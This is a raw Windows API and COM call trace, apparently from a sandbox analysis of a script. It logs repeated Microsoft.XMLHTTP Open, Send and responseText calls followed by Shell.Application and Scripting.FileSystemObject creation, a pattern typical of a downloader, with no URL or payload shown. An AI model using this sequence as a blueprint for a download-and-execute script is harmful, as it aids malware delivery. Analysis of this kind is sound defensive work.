	[0566.723] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0566.723] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0566.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0566.723] ??2@YAPEAX_K@Z () returned 0x62f310
	[0566.723] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0566.723] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0566.723] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0566.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0566.723] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0566.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0566.723] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0566.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0566.723] longjmp () 
	[0566.724] longjmp () 
	[0566.724] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0566.724] SysStringLen (param_1=0x0) returned 0x0
	[0566.724] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0566.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0566.724] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0566.724] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0566.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0566.724] ??2@YAPEAX_K@Z () returned 0x62f330
	[0566.724] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0566.724] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0566.724] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0566.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0566.724] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0566.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0566.725] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0566.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0566.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0566.725] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0566.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0567.056] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0567.056] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0567.056] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0567.057] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0567.057] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0567.057] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0567.057] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0567.057] SysStringLen (param_1=0x0) returned 0x0
	[0567.057] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0567.057] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0567.057] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0567.058] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0567.058] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0567.058] ??2@YAPEAX_K@Z () returned 0x62f350
	[0567.058] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0567.058] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0567.058] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0567.058] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0567.058] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0567.058] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0567.058] SysStringLen (param_1=0x0) returned 0x0
	[0567.058] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0568.483] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0568.483] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0568.484] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0568.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0568.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0568.484] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0571.081] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0571.081] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0571.082] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0571.083] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0571.083] SysStringLen (param_1=0x0) returned 0x0
	[0571.083] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0571.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0571.083] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0571.083] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0571.083] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0571.084] ??2@YAPEAX_K@Z () returned 0x62f330
	[0571.084] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0571.084] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0571.084] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0571.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0571.084] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0571.084] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0571.084] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0571.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0571.087] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0571.087] SysStringLen (param_1=0x0) returned 0x0
	[0571.087] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0571.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0571.087] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0571.087] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0571.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0571.087] ??2@YAPEAX_K@Z () returned 0x62f310
	[0571.087] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0571.087] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0571.087] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0571.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0571.088] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0571.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0571.088] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0571.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0571.088] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0571.088] SysStringLen (param_1=0x0) returned 0x0
	[0571.088] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0571.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
